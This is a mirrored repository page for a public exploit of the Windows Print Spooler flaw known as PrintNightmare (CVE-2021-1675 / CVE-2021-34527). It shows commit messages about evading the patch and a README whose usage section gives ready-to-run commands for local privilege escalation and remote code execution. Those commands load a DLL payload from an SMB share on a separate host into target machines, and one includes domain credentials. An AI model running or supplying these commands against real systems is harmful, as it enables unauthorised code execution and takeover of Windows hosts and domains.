r3pek/CVE-2021-1675
1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-07-27 01:51:51 +00:00
Code Releases Activity
CVE-2021-1675/SharpPrintNightmare
History
cube0x0 640d1984cd updated with \??\UNC\ path to avoid patch restriction 
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
2021-07-08 13:03:15 +02:00
..
SharpPrintNightmare updated with \??\UNC\ path to avoid patch restriction 2021-07-08 13:03:15 +02:00
CVE-2021-1675.py updated with \??\UNC\ path to avoid patch restriction 2021-07-08 13:03:15 +02:00
README.md C# Dynamic pDriverPath support 2021-07-04 21:55:28 +02:00

README.md

C# Implementation of CVE-2021-1675 / CVE-2021-34527

Update

New CVE-2021-1675.py has been uploaded which will get the same result as the C# version

No longer need to manually specify pConfigFile with C# version

Usage

The RCE functionality might need to be executed with local administrator privileges on YOUR machine.

#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll

#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'

#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123

Acknowledgements

For contributing new ideas or exploit improvements, thanks to